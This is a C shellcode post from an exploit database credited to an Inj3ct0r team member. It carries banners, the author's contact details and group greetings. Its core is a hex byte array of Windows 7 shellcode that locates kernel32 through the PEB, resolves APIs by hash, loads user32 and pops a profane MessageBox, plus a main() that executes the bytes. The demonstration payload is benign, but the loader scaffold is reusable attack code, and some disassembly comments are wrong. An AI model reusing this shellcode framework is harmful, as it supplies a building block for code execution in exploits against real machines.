/* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Platform/CatID : Shellcode - Local - Win32 # Type : Shellcode - proof of concept - Windows # Tested on : Windows7 ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! proof / test img : http://oi47.tinypic.com/2cs6g3n.jpg */ #include <stdio.h> #include <string.h> // Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes char msg[] = "\xD9\xEB" // FLDPI "\x9B" // WAIT "\xD9\x74\x24\xF4" // FSTENV %ESP // ---------- "\x31\xD2" // XOR %EDX,%EDX "\xB2\x77" // MOV %DL, 0x77 "\x31\xC9" // XOR %ECX,%ECX "\x64\x8B\x71\x30" // MOV %ESI,DWORD 0x30 "\x8B\x76\x0C" // MOV %ESI,DWORD %ESI "\x8B\x76\x1C" // MOV %ESI,DWORD %ESI 0x1C "\x8B\x46\x08" // MOV %EAX,DWORD %ESI 0x08 "\x8B\x7E\x20" // MOV %EDI,DWORD %ESI 0x20 "\x8B\x36" // MOV %ESI,DWORD %ESI "\x38\x4F\x18" // CMP BYTE %EDI 0x18,%CL "\x75\xF3" // JNZ SHORT .me "\x59" // POP %ECX "\x01\xD1" // ADD %ECX,%EDX "\xFF\xE1" // JMP %ECX "\x60" // PUSHAD "\x8B\x6C\x24\x24" // MOV %EBP,DWORD %ESP 0x24 "\x8B\x45\x3C" // MOV %EAX,DWORD %EBP 0x3C "\x8B\x54\x28\x78" // MOV %EDX,DWORD %EAX %EBP 0x78 "\x01\xEA" // ADD %EDX,%EBP "\x8B\x4A\x18" // MOV %ECX,DWORD %EDX 0x18 "\x8B\x5A\x20" // MOV %EBX,DWORD %EDX 0x20 "\x01\xEB" // ADD %EBX,%EBP "\xE3\x34" // JECXZ SHORT .me "\x49" // DEC %ECX "\x8B\x34\x8B" // MOV %ESI,DWORD %EBX %ECX "\x01\xEE" // ADD %ESI,%EBP "\x31\xFF" // XOR %EDI,%EDI "\x31\xC0" // XOR %EAX,%EAX "\xFC" // CLD "\xAC" // LODS BYTE %ESI "\x84\xC0" // TEST %AL,%AL "\x74\x07" // JE SHORT .me "\xC1\xCF\x0D" // ROR %EDI, 0x0D "\x01\xC7" // ADD %EDI,%EAX "\xEB\xF4" // JMP SHORT .me "\x3B\x7C\x24\x28" // CMP %EDI,DWORD %ESP 0x28 "\x75\xE1" // JNZ SHORT .me "\x8B\x5A\x24" // MOV %EBX,DWORD %EDX 0x24 "\x01\xEB" // ADD %EBX,%EBP "\x66\x8B\x0C\x4B" // MOV %EBX %ECX "\x8B\x5A\x1C" // MOV %EBX,DWORD %EDX 0x1C "\x01\xEB" // ADD %EBX,%EBP "\x8B\x04\x8B" // MOV %EAX,DWORD %EBX %ECX "\x01\xE8" // ADD %EAX,%EBP "\x89\x44\x24\x1C" // MOV DWORD %ESP 0x1C,%EAX "\x61" // POPAD "\xC3" // RETN /* Free GAZzA! */ "\xB2\x08" // MOV %DL,0x08 "\x29\xD4" // SUB %ESP,%EDX "\x89\xE5" // MOV %EBP,%ESP "\x89\xC2" // MOV %EDX,%EAX "\x68\x8E\x4E\x0E\xEC" // PUSH 0xEC0E4E8E "\x52" // PUSH %EDX "\xE8\x9F\xFF\xFF\xFF" // CALL .me "\x89\x45\x04" // MOV DWORD %EBP 0x04,%EAX "\xBB\x7E\xD8\xE2\x73" // MOV %EBX,0x73E2D87E "\x87\x1C\x24" // XCHG DWORD %ESP,%EBX "\x52" // PUSH %EDX "\xE8\x8E\xFF\xFF\xFF" // CALL .me "\x89\x45\x08" // MOV DWORD %EBP 0x08,%EAX "\x68\x6C\x6C\x20\x41" // PUSH 0x41206C6C "\x68\x33\x32\x2E\x64" // PUSH 0x642E3233 "\x68\x75\x73\x65\x72" // PUSH 0x72657375 "\x88\x5C\x24\x0A" // MOV BYTE %ESP 0x0A,%BL "\x89\xE6" // MOV %ESI,%ESP "\x56" // PUSH %ESI "\xFF\x55\x04" // CALL DWORD %EBP 0x04 "\x89\xC2" // MOV %EDX,%EAX "\x50" // PUSH %EAX "\xBB\xA8\xA2\x4D\xBC" // MOV %EBX,0xBC4DA2A8 "\x87\x1C\x24" // XCHG DWORD %ESP,%EBX "\x52" // PUSH %EDX "\xE8\x61\xFF\xFF\xFF" // CALL .me // ---------- /* Message Title */ "\x68\x49\x2E\x50\x58" // PUSH 0x58502E49 "\x68\x21\x20\x52\x2E" // PUSH 0x2E522021 "\x68\x20\x59\x6F\x75" // PUSH 0x756F5920 "\x68\x46\x75\x63\x6B" // PUSH 0x6B637546 // ---------- "\x31\xDB" // XOR %EBX,%EBX "\x88\x5C\x24\x0F" // MOV BYTE %ESP 0x0F,%BL "\x89\xE3" // MOV %EBX,%ESP // ---------- /* Message Content */ "\x68\x2D\x44\x7A\x58" // PUSH 0x587A442D "\x68\x64\x41\x6E\x73" // PUSH 0x736E4164 "\x68\x79\x20\x4B\x65" // PUSH 0x654B2079 "\x68\x65\x64\x20\x42" // PUSH 0x42206465 "\x68\x48\x61\x43\x6B" // PUSH 0x6B436148 // ---------- "\x31\xC9" // XOR %ECX,%ECX "\x88" // MOV BYTE "\x4C" // DEC %ESP "\x24\x13" // AND %AL,0x13 "\x89\xE1" // MOV %ECX,%ESP "\x31\xD2" // XOR %EDX,%EDX "\x52" // PUSH %EDX "\x53" // PUSH %EBX "\x51" // PUSH %ECX "\x52" // PUSH %EDX "\xFF\xD0" // CALL %EAX "\x31\xC0" // XOR %EAX,%EAX "\x50" // PUSH %EAX "\xFF\x55\x08"; // CALL DWORD %EBP 0x08 int main() { int (*dz)() = (int(*)())msg; printf("bytes: %u\n", strlen(msg)); dz(); } /* #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs #============================================================================================================*/